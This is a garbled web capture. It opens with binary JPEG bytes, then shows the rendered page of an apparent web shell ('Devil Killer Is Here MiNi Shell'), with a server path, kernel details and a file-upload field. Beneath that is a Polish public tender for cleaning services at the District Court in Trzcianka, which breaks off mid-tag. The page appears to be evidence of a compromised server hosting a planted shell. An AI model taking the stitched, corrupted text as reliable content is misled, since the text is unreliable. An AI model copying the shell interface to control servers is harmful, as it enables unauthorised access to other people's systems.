JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221122/0045152701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług sprzątania wewnątrz budynków i utrzymanie czystości terenów zewnętrznych Sądu Rejonowego w Trzciance przy ul. Staszica 1 i 3 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SĄD REJONOWY W TRZCIANCE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000324145</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stanisława Staszica 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Trzcianka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-980</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">673528985</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat.dyrektora@trzcianka.sr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.trzcianka.sr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> wymiar sprawiedliwości </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług sprzątania wewnątrz budynków i utrzymanie czystości terenów zewnętrznych Sądu Rejonowego w Trzciance przy ul. Staszica 1 i 3 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-11fdce0d-6a4f-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00451527</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00075283/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług sprzątania i czystości obiektów i terenów wewnętrznych i zewnętrznych Sądu Rejonowego w Trzciance</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-11fdce0d-6a4f-11ed-aea3-5a7c432eaced <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Portalu. Wykonawca posiadający konto ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. Szczegółowa instrukcja użytkownika wykonawcy Portalu dostępna jest na stronie Portalu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">klauzula RODO załącznik do oferty</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Złożenie oświadczenia wg załącznika do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D-360-19/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest :<br/>a/ świadczenie usług sprzątania obiektów Sądu Rejonowego w Trzciance przy ul. Staszica 1 i 3; w tym:<br/>- zamiatanie, odkurzanie dywanów i podłóg oraz czyszczenie wycieraczek wykładzinowych, <br/>- mycie podłóg i schodów we wszystkich pomieszczeniach obydwu budynków Sądu (podłogi panelowe, płytki podłogowe i drewno), bez tworzenia smug na podłogach a w razie potrzeby doczyszczenia powierzchni, użycie w tym celu specjalistycznego sprzętu,<br/>- sprzątanie serwerowni i archiwum pod nadzorem pracownika sądu w godz. 14-15.30,<br/>- sprzątanie Sali Konferencyjnej, pokoju przesłuchań i pokoju technicznego przynajmniej jeden raz w tygodniu oraz po każdym odbywającym się tam szkoleniu bądź przesłuchaniu ( budynek ul. Staszica 3),<br/>- oczyszczanie z kurzu biurek, kontenerów biurowych, monitorów komputerowych, drukarek, stołów, stolików i innych odkrytych powierzchni,<br/>- przecieranie na wilgotno nóg krzeseł i stołów,<br/>- opróżnianie koszów na śmieci oraz niszczarek,<br/>- mycie parapetów,<br/>- mycie balustrad i poręczy schodowych,<br/>- mycie okien, ram okiennych i ościeżnic od zewnątrz i wewnątrz budynku przynajmniej 3 razy w roku,<br/>- mycie przeszklenia w biurze podawczym oraz drzwi szklanych ( budynek ul. Staszica 1 i 3) , ściany szklanej z drzwiami (budynek ul. Staszica 3) a także czyszczenie wszystkich ekranów ochronnych z pleksi,<br/>- mycie drzwi i futryn wewnętrznych co najmniej raz na miesiąc,<br/>- mycie kaloryferów przynajmniej raz na kwartał,<br/>- usuwanie pajęczyn,<br/>- sprzątanie całkowite łazienek, w tym kafli na ścianach, toalet, bidetów, zlewów i innych powierzchni,<br/>- mycie drzwi wejściowych w budynku ul. Staszica 1 i 3 oraz sprzątanie wejść głównych do obu budynków;<br/>b/ dostarczenie środków czystości do obu budynków, tj. m.in. mydła w płynie, białych ( białość co najmniej na poziomie 85%), dobrej jakości ręczników, które się nie rozpadają, nie pylą oraz nie wydzielają nieprzyjemnego zapachu w kontakcie z wodą, białego papieru toaletowego, gąbek i płynu do mycia naczyń, sprayów zapachowych i odświeżaczy, środków do dezynfekcji oraz innych nie wymienionych środków niezbędnych do utrzymania czystości w budynkach;<br/>c/ Sprzątanie i utrzymanie czystości terenu przyległego do budynków sądu, (terenów zewnętrznych budynków Sądu) ul. Staszica 1 i 3 – częstotliwość w zależności od potrzeb ( bez konieczności wzywania Wykonawcy w tym zakresie) , w tym:<br/>- koszenie trawników,<br/>- grabienie liści opadających z drzew,<br/>- przycinanie gałęzi i krzewów, usuwanie uschniętych pędów i gałęzi drzew i krzewów, <br/>- utrzymanie czystości parkingu, <br/>- opróżnienie zewnętrznych koszy na śmieci,<br/>- pielęgnacja zieleni przy budynku Sądu ul. Staszica 1 i 3 (podlewanie, odchwaszczanie, zbiór liści, innych suchych roślin oraz śmieci zalegających na kamieniach ozdobnych),<br/>- odśnieżanie dróg wjazdowych oraz wszystkich wejść do budynków Sądu wraz z usunięciem nadmiaru śniegu oraz błota pośniegowego, skuwanie lodu przed przyjściem i przyjazdem pracowników do Sądu;<br/>- posypywanie piaskiem i solą wejść i schodów do budynku oraz wjazdu na parking sądowy we wczesnych godzinach rannych przed przyjściem i przyjazdem pracowników do Sądu ;<br/>d/ sprzątanie pomieszczeń po pracach remontowych i konserwacyjnych (po ustaleniu szczegółów z Wykonawcą, także przed rozpoczęciem godzin pracy w Sądzie, w pomieszczeniach remontowanych),<br/>e/ inne czynności związane z utrzymaniem czystości i porządku w budynkach sądu typu odkażanie pomieszczeń często użytkowanych powierzchni: m.in. klamek, blatów, poręczy schodowych (środki nie uszkadzające drewnianych powierzchni) toalet, zlewów itp..<br/>f/ wykonywanie innych czynności porządkowych na zlecenie Dyrektor Sądu lub upoważnionego pracownika.<br/>2 .Usługa winna być wykonywana po godzinach pracy Sądu, tj. od godz. 14.00 (pomieszczenia ze szczególną kontrola dostępu: serwerownia, archiwum) i maksymalnie do godz. 20.00. Zamawiający może zażądać usługi sprzątania przed godzinami pracy Sądu w przypadku prowadzonych prac remontowych lub innych powodujących silne zabrudzenia w pomieszczeniach Sądu (koszt dodatkowej usługi należy uwzględnić w ofercie).<br/>3. Zamawiający wymaga dyspozycyjności i nadzorowania wykonywania usługi ze strony wykonawcy , w tym dokonywania kontroli pracowników wykonawcy i świadczonej przez nich pracy co najmniej 1 raz w tygodniu.<br/>4. Powierzchnia budynków Sądu Rejonowego w Trzciance i terenów przyległych objętych przedmiotem postępowania:<br/>a/ Budynek znajdujący się przy ul. Staszica 1 są IV kondygnacje ( łącznie z piwnicą) i 3 klatki schodowe wewnętrzne :<br/>•	Piwnica – 323,28 m² - archiwa , pomieszczenie dla archiwisty, pomieszczenie aresztowe i toaleta przynależna do pomieszczenia aresztowego;<br/>•	Parter – 344,12 m² - 8 pomieszczeń, w tym 5 sal rozpraw i toaleta dla klientów <br/>•	I piętro – 350,74 m²- 12 pomieszczeń , w tym 6 pomieszczeń sekretariatów sądowych, 3 pomieszczenia gabinetów sędziowskich, kasa, serwerownia oraz toaleta dla pracowników;<br/>•	II piętro- 322,71 m² - 14 pomieszczeń, w tym 3 sekretariaty, 2 pomieszczenia księgowości, 6 gabinetów sędziowskich i gabinet dyrektora, kancelaria tajna oraz toaleta dla pracowników.<br/>b/ Teren wokół budynku ul. Staszica 1 to ok. 883 m² .<br/>c/ Budynek znajdujący się przy ul. Staszica 3 są IV kondygnacje ( łącznie z piwnicą ) i 2 klatki schodowe:<br/>•	Piwnica – 110,57 m² - archiwa i pomieszczenie gospodarcze;<br/>•	Parter – 229,82 m² - 9 pomieszczeń, w tym: 1 sala rozpraw, 2 pomieszczenia sekretariatu sądowego, 1 gabinet sędziowski, 2 pomieszczenia kuratorów sądowych, archiwum Wydziału Ksiąg Wieczystych, serwerownia i 2 toalety ( 1 dla klientów, 1 dla pracowników);<br/>•	I piętro – 240,21 m² - 10 pomieszczeń, w tym 1 sekretariat sądowy, 1 gabinet sędziego, 5 pomieszczeń kuratorskich, pokój informatyka, pomieszczenie gospodarczo-socjalne, toaleta dla pracowników;<br/>•	Poddasze – 233,92 m² - sala konferencyjna, pokój przesłuchań i pokój techniczny do pokoju przesłuchań<br/>d/ Teren wokół budynku ul. Staszica 3 to ok. 350 m². </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90910000-9 - Usługi sprzątania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90911200-8 - Usługi sprzątania budynków</p> <p class="mb-0">90914000-7 - Usługi sprzątania parkingów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamawiający przy wyborze oferty najkorzystniejszej będzie się kierował następującym kryterium:<br/>a/ cena – waga wynosi 90 %<br/>b/ koncepcja realizacji usług – maksymalnie 10 %<br/>2. Punkty za kryterium ceny będą obliczane wg następującego wzoru:<br/> Cena oferty najtańszej<br/> ------------------------------ x 90 = liczba punktów<br/> Cena oferty badanej<br/><br/>3. Punkty za kryterium „koncepcja realizacji usług „ będą przyznawane na podstawie następujących podkryteriów:<br/>a/ mycie okien – częstotliwość i terminy usługi oraz organizacja tej części usługi;<br/>b/ stosowane środki czystości i sprzęt (opis, ewentualnie zdjęcia i wskazanie stosowanych marek środków i sprzętu);<br/>c/ organizacja pracy, podział zadań pracowników oraz ich ilość;<br/>d/ kontrola jakości i nadzór nad wykonywaniem usługi<br/>Koncepcja realizacji usług winna stanowić załącznik do oferty i odnieść się do wszystkich wymienionych podkryteriów. Brak opisu któregokolwiek podkryterium punktowany będzie jako 0 pkt. Podkryteria opisane przez Wykonawcę zostaną zestawione i będą porównanie z innymi ofertami a punktowane będą w następujący sposób:<br/>- 1 pkt – identycznie dobre;<br/>- 2 pkt – trochę lepsza oferta;<br/>- 3 pkt – zdecydowanie lepsza;<br/>- 4 pkt- bardzo dobra, najlepsza oferta<br/>Maksymalnie oferent za koncepcję wykonywania usługi może uzyskać 10 pkt.<br/>4. Punkty zostaną przyznane każdej ofercie . Punktacja ostateczna to suma ilości punktów przyznanych za kryterium ceny i kryterium koncepcji realizacji usług. Wybrana zostanie oferta najkorzystniejsza, tj. o jak najwyższej ilości uzyskanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koncepcja realizacji usług</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1 . Złożenie oświadczenia o niepodleganiu o wykluczeniu z postępowania<br/>2. Oferent spełni warunek posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej jeśli przedstawi dokument potwierdzający prowadzenie działalności w zakresie objętym przedmiotem postępowania w ciągu co najmniej 3 lat.<br/>3. Wraz z ofertą oferent jest zobowiązany przedstawić oświadczenie, że nie był karany i nie toczy się wobec niego żadne postepowanie przygotowawcze oraz sądowe (postępowań wykroczeniowych nie związanych z działalnością gospodarczą nie należy brać pod uwagę ), w przypadku spółki oświadczenie winno dotyczyć wspólników lub członków zarządu ( w zależności od rodzaju spółki).<br/>4. Wraz z ofertą oferent jest zobowiązany przestawić zaświadczenie , że nie posiada zaległości w podatkach i składkach ZUS i jego wynagrodzenie nie będzie podlegało zajęciu egzekucyjnemu.<br/>5. Oferent zobowiązany jest do przedłożenia wraz z ofertą co najmniej 3 referencji, z których wynikać będzie, że wykonał co najmniej 3 umowy w przeciągu ostatnich 5 lat , których przedmiot jest tożsamy z przedmiotem postępowania , dla jednostek budżetowych lub komercyjnych o wartości nie mniejszej niż 50.000 zł.<br/>Ocena warunków: kwalifikacja spełnia/ nie spełnia warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wg wzoru stanowiącego załącznik do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnieniu warunków udziału w postepowaniu oraz braku podstaw do wykluczenia z postępowania – wzór oświadczenia załącznik nr 3 do SWZ. Oświadczenia te stanowią dowody potwierdzające brak podstaw wykluczenia i spełnienie warunków udziału w postępowaniu na dzień składania ofert. Brak oświadczenia spowoduje odrzucenie oferty.<br/>2. Zamawiający, zgodnie z art.274 ustawy PZP wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania oświadczeń i zaświadczeń wymienionych w pkt 13 SWZ , które zostaną potraktowane jako podmiotowe środki dowodowe, o ile Oferent nie złoży wszystkich oświadczeń i zaświadczeń razem z ofertą. <br/>3.Ponadto Zamawiający wezwie Wykonawcę do przedłożenia kopii polisy ubezpieczeniowej OC na kwotę co najmniej 200.000 zł jako podmiotowego środka dowodowego.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> FORMALNOŚCI, KTÓRE MUSZA ZOSTAĆ DOPEŁNIONE PO WYBORZE OFERT <br/>1. Wykonawca jest zobowiązany przedstawić listę pracowników wraz z oświadczeniem każdego pracownika, że w terminie 3 lat poprzedzających ofertę nie był karany i nie toczy się wobec niego żadne postepowanie przygotowawcze oraz sądowe ( także w zakresie postępowania karnoskarbowego czy wykroczeniowego) wraz z informacją o rodzaju umowy, która jest lub będzie zawarta ze wskazanymi pracownikami a następnie, po zawarciu umowy, kserokopie zawartych umów z pracownikami.<br/>2. Wykonawca jest zobowiązany do przedłożenia aktualnego wypisu z krajowego rejestru karnego, poświadczającego, że właściciel, współwłaściciel, prezes zarządu czy inny przedstawiciel Wykonawcy nie był karany oraz oświadczenia, że nie toczą się żadne postepowania karne lub karnoskarbowe przeciwko osobie lub przedstawicielom Wykonawcy.<br/>3. Wykonawca jest zobowiązany do przedłożenia kserokopie wraz z oryginałem ubezpieczenia odpowiedzialności cywilnej opiewającego co najmniej na kwotę 200.000 zł na cały okres obowiązywania umowy z wykonawcą (ewentualnie na okresy roczne). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferent zobowiązany jest wnieść wadium w wysokości: 5200 zł <br/>(słownie: pięćtysięcydwieściezłotych 00/100),<br/>2.	Termin wniesienia wadium:<br/>a) Wadium wnosi się przed upływem terminu składania ofert pod rygorem wykluczenia z postępowania. <br/>b/ Wadium uznaje się za wniesione, jeżeli:<br/>- wnoszone w formie pieniądza znalazło się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert,<br/>- wnoszone w formie gwarancji lub poręczenia- Oferent przekazał Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej załączonej do oferty.<br/><br/>c) Dokument potwierdzający wniesienie wadium w pieniądzu należy dołączyć do oferty, przy czym należy je wnieść na rachunek bankowy nr: <br/>58 1130 1017 0021 1001 5990 0004<br/>z dopiskiem &#34;wadium – postępowanie w sprawie świadczenia usług sprzątania wewnątrz budynków i utrzymanie czystości terenów zewnętrznych Sądu Rejonowego w Trzciance przy ul. Staszica 1 i 3”<br/><br/>3.Zwrot lub zatrzymanie wadium nastąpi zgodnie z art. 98 Ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Nie przewiduje się udzielenia zamówienia dla wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span 